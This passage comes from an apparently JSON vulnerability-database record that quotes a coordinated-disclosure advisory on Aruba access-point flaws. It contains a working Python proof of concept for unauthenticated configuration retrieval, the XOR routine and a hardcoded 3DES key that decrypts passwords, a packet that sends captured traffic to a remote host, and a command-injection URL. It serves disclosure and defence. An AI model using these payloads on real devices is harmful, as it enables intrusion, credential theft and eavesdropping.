device.arubanetworks.com:\n\n HTTP/1.0 200 OK\n Date: Wed, 11 Nov 2015 12:12:20 GMT\n Content-Length: 91\n Content-Type: text/plain; charset=UTF-8\n X-Activation-Key: FXXXXXXX\n X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e\n X-Status-Code: success\n X-Type: firmware-check\n X-Mandatory-Upgrade: true\n Connection: close\n\n\n 6.4.2.6-4.1.1.10_51810\n 23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810\n\n\nAs shown above, the Header \"X-Mandatory-Upgrade\" was added to the server\u0027s\nreply. This causes the AP to skip its validation checks and accept any firmware\nversion provided, regardless if it is the same or older than the current one. \n\n-----------------------------------------------------------\n16. AP: Firmware update check discloses machine certificate\n-----------------------------------------------------------\n\nWhile observing the traffic between an AP and device.arubanetworks.com, it was\ndiscovered that the AP discloses it\u0027s machine certificate to the remote\nendpoint. \n\n POST /firmware HTTP/1.1\n Host: 10.0.XX.XX\n Content-Length: 2504\n Connection: close\n X-Type: firmware-check\n X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n X-OEM-Tag: Aruba\n X-Mode: IAP\n X-Factory-Default: Yes\n X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec\n X-Current-Version: 6.4.2.6-4.1.1.10_51810\n X-Organization: ***REMOVED (Company Internal Name)***\n X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155\n X-Features: 0000100001001000000000000000000000000000000000010000000\n X-Challenge-Hash: SHA-1\n\n\n -----BEGIN CERTIFICATE-----\n MIIGTjCCBTagAwI... \n [...]\n -----END CERTIFICATE-----\n\n\nThe certificate sent in the above request is the same (in PEM format) as found\nunder the following path on the AP:\n\n /tmp/deviceCerts/certifiedKeyCert.der\n\nComparison of the certificate from the HTTP Request and from the AP filesystem:\n\n $ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem\n 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8\ndumped-fw-cert.txt\n 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8\ncertifiedKeyCert.der.pem\n\n---------------------------------------------------------\n17. AP: Firmware is downloaded via unencrypted connection\n---------------------------------------------------------\n\nFirmware images are downloaded via unencrypted HTTP to the AP. An example reply\ncontaining the download paths looks as follows:\n\n HTTP/1.1 200 OK\n Date: Wed, 11 Nov 2015 13:18:58 GMT\n Content-Length: 552\n Content-Type: text/plain; charset=UTF-8\n X-Activation-Key: FXXXXXXX\n X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e\n X-Status-Code: success\n X-Type: firmware-check\n Connection: close\n\n\n 6.4.2.6-4.1.1.10_51810\n 25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810\n 30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810\n 15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810\n 10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810\n 23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810\n 26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810\n\nAn attacker could potentially MiTM connections to images.arubanetworks.com and\npossibly replace the firmware images downloaded by the AP. \n\n----------------------------------------------------------------------\n18. AP: Firmware update Challenge/Response does not protect the Client\n----------------------------------------------------------------------\n\nThe update check process between AP and device.arubanetworks.com works\nas follows:\n\n AP =\u003e device.arubanetworks.com\n POST /firmware\n X-Type: firmware-check\n\n AP \u003c= device.arubanetworks.com\n 200 OK\n X-Session-Id: bd4... \n X-Challenge: 123123... \n\n AP =\u003e device.arubanetworks.com\n POST /firmware\n X-Session-Id: bd4... \n\n [machine certificate]\n [signature]\n\n AP \u003c= device.arubanetworks.com\n 200 OK\n X-Session-Id: bd4... \n\n [firmware image urls]\n\nWhen inspecting the communication process carefully, it is clear that the final\nresponse from device.arubanetworks.com does not contain any (cryptographic)\nsignature. An attacker could impersonate device.arubanetworks.com, send an\narbitrary challenge, ignore the response and just reply with a list of firmware\nimages. The only thing that has to be kept the same over requests is the\nX-Session-Id header, which is also sent initially by the remote host and not\nthe AP and therefore under full control of the attacker. \n\n------------------------------------------\n19. AP: Unencrypted private keys and certs\n------------------------------------------\n\nThe AP firmware image contains the unencrypted private key and certificate for\nsecurelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key\nand cert was found under the path /aruba/conf/cpprivkey.pem. \n\n $ openssl x509 -in cpprivkey.pem -text -noout\n Certificate:\n Data:\n Version: 3 (0x2)\n Serial Number: 121426 (0x1da52)\n Signature Algorithm: sha1WithRSAEncryption\n Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL,\nCN=GeoTrust DV SSL CA\n Validity\n Not Before: May 11 01:22:10 2011 GMT\n Not After : Aug 11 04:40:59 2017 GMT\n Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF,\nC=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See\nwww.geotrust.com/resources/cps (c)11, OU=Domain Control Validated -\nQuickSSL(R) Premium, CN=securelogin.arubanetworks.com\n [...]\n\n $ openssl rsa -in cpprivkey.pem -check\n RSA key ok\n writing RSA key\n -----BEGIN RSA PRIVATE KEY-----\n MIIEpQIBAAKCAQEA\u2026. \n [...]\n -----END RSA PRIVATE KEY-----\n\n---------------------------------------\n20. AP: Potential signature private key\n---------------------------------------\n\nA potential SSL key was found under the path /etc/sig.key. Based on the header\n(3082xxxx[02,03]82), the file looks like a SSL key in DER format:\n\n$ xxd etc/sig.key\n00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb 0.........-q.... \n\nIt was not possible to decode the key. Therefore it\u0027s not 100% clear if is an\nactual key or just a garbaged file. \n\n------------------------------------------------\n21. AP: PAPI Endpoints exposed to all interfaces\n------------------------------------------------\n\nThe PAPI endpoint \"msgHandler\" creates listeners on all interfaces. Therefore\nit is reachable via wired and wireless connections to the AP. This increases\nthe potential attack surface. \n\n # netstat -nlu | grep :82\n udp 0 0 :::8209 :::*\n udp 0 0 :::8211 :::*\n\nAdditionally the local ACL table of the AP contains a default firewall rule,\npermitting any traffic to udp/8209-8211, overwriting any manually set ACL to\nblock access to PAPI:\n\n 00:0b:86:XX:XX:XX# show datapath acl 106\n Datapath ACL 106 Entries\n -----------------------\n Flags: P - permit, L - log, E - established, M/e - MAC/etype filter\n S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror\n I - Invert SA, i - Invert DA, H - high prio, O - set prio, C -\nClassify Media\n A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6\n K - App Throttle, d - Domain DA\n ----------------------------------------------------------------\n 1: any any 17 0-65535 8209-8211 P4\n [...]\n 12: any any any P4\n 00:0b:86:XX:XX:XX#\n\n------------------------------------------------------\n22. AP: PAPI Endpoint does not validate MD5 signatures\n------------------------------------------------------\n\nMD5 signature validation for incoming PAPI packets is disabled on the AP:\n\n # ps | grep msgHandler\n 1988 root 508 S \u003c /aruba/bin/msgHandler -n\n\n # /aruba/bin/msgHandler -h\n usage: msgHandler [-d] [-n]\n -d = enable debug prints. \n -n = disable md5 signatures. \n -g = disable garbling. \n\nThe watchdog service (\"nanny\") also restarts the PAPI handler with disabled MD5\nsignature validation:\n\n # grep msgH /aruba/bin/nanny_list\n RESTART /aruba/bin/msgHandler -n\n\n--------------------------------------------------------------\n23. AP: PAPI protocol encrypted with weak encryption algorithm\n--------------------------------------------------------------\n\nPAPI packets sent to an AP contain an encrypted payload. The encryption seems\nto replace the MD5 signature check as described in #4 and used when PAPI is\nsent from AP to AMP. This might also explain why the PAPI endpoint runs with\ndisabled MD5 signature verification on the AP (see #22). \n\nThe following example shows an encrypted PAPI packet for the command\n\"show version\" as received by the AP:\n\n 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ \n 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... \n 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0040 00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93 ................ \n 0050 a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97 .....n.......... \n 0060 93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd ................ \n 0070 fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb ................ \n 0080 fc e4 b3 e5 f6 e1 e0 fa fc fd 99 ........... \n\nImportant parts of the above packet:\n\n 7f 00 00 01 Destination IP (127.0.0.1)\n 0a 00 00 01 Source IP (10.0.0.1)\n 3b 60 Destination Port (15200)\n 3b 7e Source Port (15230)\n 97 93 93 93-EOF Encrypted PAPI payload\n\nComparison of the above packet with a typical PAPI packet that is sent from the\nAP to the AMP quickly highlights the missing 0x00 that are used to pad certain\nfields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which\nis a clear indication that the payload is \"encrypted\" with a 1 byte XOR. As\nXOR\u0027ing 0x00 with 1 byte results in the same byte, the payload therefore\ndiscloses the key used and use of the weak XOR algorithm:\n\n 0x00: 00000000\n ^ 0x93: 10010011\n ================\n 10010011 (0x93)\n\nThe following shows the above PAPI packet for \"show version\" with its payload\ndecrypted:\n\n 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ \n 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... \n 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ \n 0050 3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 :............... \n 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn\n 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68 irdzB5dtVxb...sh\n 0080 6f 77 20 76 65 72 73 69 6f 6e 0a ow version. \n\n(The string starting with \"zxr...\" is a HTTP session ID, see #25 on details how\nto bypass this). \n\nAn example Python function for en-/decrypting PAPI payloads could look like\nthis:\n\n def aruba_encrypt(s):\n return \u0027\u0027.join([chr(ord(c) ^ 0x93) for c in s])\n\n-------------------------------------------\n24. AP: PAPI protocol authentication bypass\n-------------------------------------------\n\nBesides it\u0027s typical use between different Aruba devices, PAPI is also used as\nan inter-process communication (IPC) mechanism between the CGI based web\nfrontend and the backend processes on the AP. Certain commands that can be sent\nvia PAPI are only supposed to be used via this IPC interface and not from an\nexternal source. Besides the weak \"encryption\" that is described in #23, some\nPAPI packets contain a HTTP session ID (SID), that matches the SID issued at\nlogin to the web frontend. \n\nExample IPC packet (payload decrypted as shown in #23):\n\n 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ \n 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... \n 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ \n 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... \n 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn\n 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68 irdzB5dtVxb...sh\n 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration\n 0090 0a . \n\nThe SID in the example shown is \"zxroCOUwnirdzB5dtVxb\". The 0x14 before that\nindicates the length of the 20 byte SID. If the session is expired or an\ninvalid session is specified, the packet is rejected by the PAPI endpoint\n(msgHandler). \n\nReplacing the 20 byte SID with 20 * 0x00, bypasses the SID check and therefore\nallows unauthenticated PAPI communication with the AP. \n\nExample IPC packet (Session ID replaced with 20 * 0x00, payload not XOR\u0027ed for\nreadability):\n\n 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ \n 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... \n 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ \n 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... \n 0060 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 ................ \n 0070 00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68 ..............sh\n 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration\n 0090 0a\n\nUsing the above example, it is possible to request the system configuration\nfrom an AP, bypassing all authentication methods. \n\nIf the above packet is sent using IPC from the webfrontend cgi to the backend,\n(localhost) the reply looks like follows:\n\nmsg_ref 303 /tmp/.cli_msg_SW9iVE\n\nThe cgi binary then reads this file and renders the content in the HTTP reply. \nIf the PAPI packet comes from an external address (instead of localhost) the\nreply points to the APs web server (10.0.0.26 in this case) instead of /tmp/:\n\nmsg_ref 2689 http://10.0.0.26/.cli_msg_n011xh\n\nAccess to this file does not require authentication which raises the severity\nof this vulnerability significantly. \n\nThe following Python script is a proof of concept for this vulnerability,\nsending a \"show configuration\" packet to an AP with the IP address 10.0.0.26:\n\n import socket\n def aruba_encrypt(s):\n return \u0027\u0027.join([chr(ord(c) ^ 0x93) for c in s])\n header = (\n \u0027\\x49\\x72\\x00\\x03\\x7f\\x00\\x00\\x01\\x0a\\x00\\x00\\x01\\x00\\x00\\x20\\x13\u0027\n \u0027\\x3b\\x60\\x3b\\x7e\\x20\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n )\n payload = ( # show configuration\n \u0027\\x04\\x00\\x00\\x00\\x40\\x04\\x00\\x00\\x01\\xfd\\x05\\x0a\\x00\\x00\\x01\\x06\u0027\n \u0027\\x07\\x02\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x00\u0027\n \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n \u0027\\x00\\x13\\x73\\x68\\x6f\\x77\\x20\\x63\\x6f\\x6e\\x66\\x69\\x67\\x75\\x72\\x61\u0027\n \u0027\\x74\\x69\\x6f\\x6e\\x0a\u0027\n )\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind((\u0027\u0027, 1337))\n sock.sendto(header + aruba_encrypt(payload), (\u002710.0.0.26\u0027, 8211))\n buff = sock.recvfrom(4096)\n print aruba_encrypt(buff[0])\n\nExecuting the above PoC:\n\n # python arupapi.py\n [...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh\n\nDownloading the file referenced by the reply returns the full AP configuration,\nincluding all users, passwords and settings (no auth is required on the HTTP\nrequest either):\n\n # curl -Lk http://10.0.0.26/.cli_msg_n011xh\n version 6.4.2.0-4.1.1\n virtual-controller-country XX\n virtual-controller-key b49ff***REMOVED***\n name instant-XX:XX:XX\n terminal-access\n clock timezone none 00 00\n rf-band all\n [...]\n mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa\n [...]\n (full configuration file continues)\n\nFor APs running in \"managed mode\", the above shown exploit does not work. The\nreason for that is, that these APs don\u0027t provide a web server and have only a\nlimited set of commands that can be executed via PAPI. \n\nAdditionally, APs in managed mode do not seem to use the XOR based \"encryption\"\nor MD5 checksums - there was no authentication/encryption found at all. \n\nOne interesting payload for APs in \"managed mode\" using the limited subset of\navailable commands is the ability to capture traffic and send it to a remote\nendpoint via UDP. The example command on the controller would be:\n\n (aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1\n100.105.134.45 1337 0 radio 0\n\nThis command would send all traffic of AP 192.168.0.1 from the first radio\ninterface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the Packet\nwould look like this:\n\n 0000 49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00 Ir.............. \n 0010 20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00 ! . ..H..6..... \n 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ \n 0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65 ...............e\n 0050 78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a xecuteCommandObj\n 0060 65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04 ect............. \n 0070 38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00 8225............ \n 0080 02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41 ..........AP...A\n 0090 50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55 P...PACKET-CAPTU\n 00a0 52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 RE...PACKET-CAPT\n 00b0 55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00 URE...RAW-START. \n 00c0 00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50 ..RAW-START...IP\n 00d0 2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e -ADDR...192.168. \n 00e0 30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00 0.1...target-ip. \n 00f0 00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35 ..100.105.134.45\n 0100 00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00 ...target-port.. \n 0110 04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00 .1337...format.. \n 0120 01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00 .0...RADIO...0.. \n 0130 00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65 ..............se\n 0140 63 61 00 00 04 72 6f 6f 74 ca...root\n\nWhen sending this packet to an AP running in managed mode, it confirms the\ncommand and starts sending traffic to the specified host:\n\n [...]\u003cre\u003e\u003cdata name=\"Packet capture has started for pcap-id\"\npn=\"true\"\u003e1\u003c/data\u003e\u003c/re\u003e\n\n---------------------------------------------------------\n25. AP: Broadcast with detailed system information (LLDP)\n---------------------------------------------------------\n\nAruba APs broadcast detailed system and version information to the wired\nnetworks via LLDP (Link Layer Discovery Protocol). \n\n 0000 02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e .......z2....... \n 0010 7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36 z2...x..00:0b:86\n 0020 3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61 :XX:XX:XX.:Aruba\n 0030 4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31 OS (MODEL: RAP-1\n 0040 35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34 55), Version 6.4\n 0050 2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35 .2.6-4.1.1.10 (5\n 0060 31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a 1810)........... \n 0070 00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe ..\"........eth0. \n 0080 06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00 ................ \n 0090 00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00 .........l...... \n 00a0 12 0f 04 06 76 00 00 ....v.. \n\nThe broadcast packet contains the APs MAC address, model number and exact\nfirmware version.This detailed information could aid an attacker to easily find\nand identify potential targets for known vulnerabilities. \n\n------------------------------------------------------\n26. AP: User passwords are encrypted with a static key\n------------------------------------------------------\n\nBased on the vulnerability shown in #24 which potentially discloses the\npassword hashes of AP user accounts, the implemented hashing algorithm was\ntested. CVE-2014-7299 describes the password hashes as \"encrypted password\nhashes\". The following line shows the mgmt-user configuration for the user\n\"admin\" with password \"admin\":\n\n mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa\n\nSome testing with various passwords and especially password lengths showed that\nthe passwords are actually encrypted and not hashed (as hash algorithms produce\nthe same length output for different length input):\n\n f9ac59cd431e174fb07539a8a811a1aa # admin\n d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin\n\nThe encryption algorithm used for the above passwords turned out to be 3DES in\nCBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded\non the AP. Sampling of different Firmware versions confirmed that the key is\nidentical for all available versions. The IV required for 3DES consists of 8\nrandom bytes, and is stored as the first 8 byte of the encrypted password. The\nfollowing Python script can be used to decrypt the above hashes:\n\n import pyDes\n hashes = (\n \u0027f9ac59cd431e174fb07539a8a811a1aa\u0027, # admin\n \u0027d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf\u0027 # adminadmin\n )\n key = (\n \u0027\\x32\\x74\\x10\\x84\\x91\\x17\\x75\\x46\\x14\\x75\\x82\\x92\u0027\n \u0027\\x43\\x49\\x04\\x59\\x18\\x69\\x15\\x94\\x27\\x84\\x30\\x03\u0027\n )\n for h in hashes:\n d = pyDes.triple_des(key, pyDes.CBC, h.decode(\u0027hex\u0027)[:8], pad=\u0027\\00\u0027)\n print h, \u0027=\u003e\u0027, d.decrypt(h.decode(\u0027hex\u0027)[8:])\n\nMitigation\n==========\nAruba released three advisories, related to the issues reported here:\n\n http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt\n http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt\n http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt\n\nFollowing the resolution advises given in those advisories is strongly\nrecommended. These advisories are also available on the Aruba security bulletin:\n\n http://www.arubanetworks.com/support-services/security-bulletins/\n\nFor the vulnerabilities related to PAPI, Aruba has made the following document\navailable:\n\n http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf\n\nThis doc gives several advises how to remediate the PAPI related\nvulnerabilities. An update fixing the issues is announced for Q3/2016. \nFor further information there is also a discussion thread in Aruba\u0027s Airheads\nCommunity Forum:\n\n http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840\n\nAuthor\n======\nThe vulnerabilities were discovered by Sven Blumenstein from Google Security\nTeam. \n\n\nTimeline\n========\n2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day\n disclosure deadline (2016/04/22). \n2016/01/22 - Aruba acknowledges report and starts working on the issues. \n2016/02/01 - Asking Aruba for ETA on detailed feedback. \n2016/02/03 - Detailed feedback for all reported vulnerabilities received. \n2016/02/16 - Answered several questions from the feedback, asked Aruba for\n patch ETA. \n2016/02/29 - Pinged for patch ETA. \n2016/03/08 - Pinged for patch ETA. \n2016/03/12 - Received detailed list with approx. ETA for patch releases and\n current status. \n2016/03/21 - Aruba asks for extension of 90 day disclosure deadline. \n2016/03/24 - Asked Aruba for exact patch release dates. \n2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch\n update for 2016/04/30 (past 90 day deadline). \n2016/04/14 - 14 day grace period for disclosure was granted, according to\n the disclosure policy. New disclosure date was set to 2016/05/06. \n2016/05/02 - Asking for status of still unreleased \u0027end of April\u0027 update. \n2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace\n period). \n2016/05/03 - Aruba released three advisories on\nhttp://www.arubanetworks.com/support-services/security-bulletins/\n2016/05/06 - Public disclosure", "sources": [ { "db": "NVD", "id": "CVE-2016-2031" }, { "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "db": "BID", "id": "90207" }, { "db": "PACKETSTORM", "id": "136997" } ], "trust": 1.98 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2031", "trust": 2.8 }, { "db": "BID", "id": "90207", "trust": 1.9 }, { "db": "PACKETSTORM", "id": "136997", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-431802", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2016-009614", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-20-315-05", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.4046", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201607-362", "trust": 0.6 } ], "sources": [ { "db": "BID", "id": "90207" }, { "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "db": "PACKETSTORM", "id": "136997" }, { "db": "CNNVD", "id": "CNNVD-201607-362" }, { "db": "NVD", "id": "CVE-2016-2031" } ] }, "id": "VAR-202001-1251", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.13247864 }, "last_update_date": "2022-05-04T09:26:12.685000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "ARUBA-PSA-2016-004", "trust": 0.8, "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-004.txt" }, { "title": "Aruba Networks ArubaOS , AirWave Management Platform and Instant Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=62934" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "db": "CNNVD", "id": "CNNVD-201607-362" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "db": "NVD", "id": "CVE-2016-2031" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-004.txt" }, { "trust": 1.6, "url": "http://seclists.org/fulldisclosure/2016/may/19" }, { "trust": 1.6, "url": "https://packetstormsecurity.com/files/136997/aruba-authentication-bypass-insecure-transport-tons-of-issues.html" }, { "trust": 1.6, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-431802.pdf" }, { "trust": 1.6, "url": "https://www.securityfocus.com/bid/90207" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2031" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2031" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.4046/" }, { "trust": 0.6, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-315-05" }, { "trust": 0.1, "url": "https://www.geotrust.com/resources/cps" }, { "trust": 0.1, "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-005.txt" }, { "trust": 0.1, "url": "http://community.arubanetworks.com/t5/aaa-nac-guest-access-byod/security-vulnerability-advisories/m-p/266095#m25840" }, { "trust": 0.1, "url": "http://images.arubanetworks.com/fwfiles/arubainstant_aries_6.4.2.6-4.1.1.10_51810" }, { "trust": 0.1, "url": "http://images.arubanetworks.com/fwfiles/arubainstant_pegasus_6.4.2.6-4.1.1.10_51810" }, { "trust": 0.1, "url": "http://images.arubanetworks.com/fwfiles/arubainstant_centaurus_6.4.2.6-4.1.1.10_51810" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2032" }, { "trust": 0.1, "url": "http://10.0.xx.xx/?\"`/sbin/utelnetd`\"" }, { "trust": 0.1, "url": "http://www.arubanetworks.com/support-services/security-bulletins/" }, { "trust": 0.1, "url": "http://10.0.0.26/.cli_msg_n011xh" }, { "trust": 0.1, "url": "http://images.arubanetworks.com/fwfiles/arubainstant_taurus_6.4.2.6-4.1.1.10_51810" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7299" }, { "trust": 0.1, "url": "http://images.arubanetworks.com/fwfiles/arubainstant_cassiopeia_6.4.2.6-4.1.1.10_51810" }, { "trust": 0.1, "url": 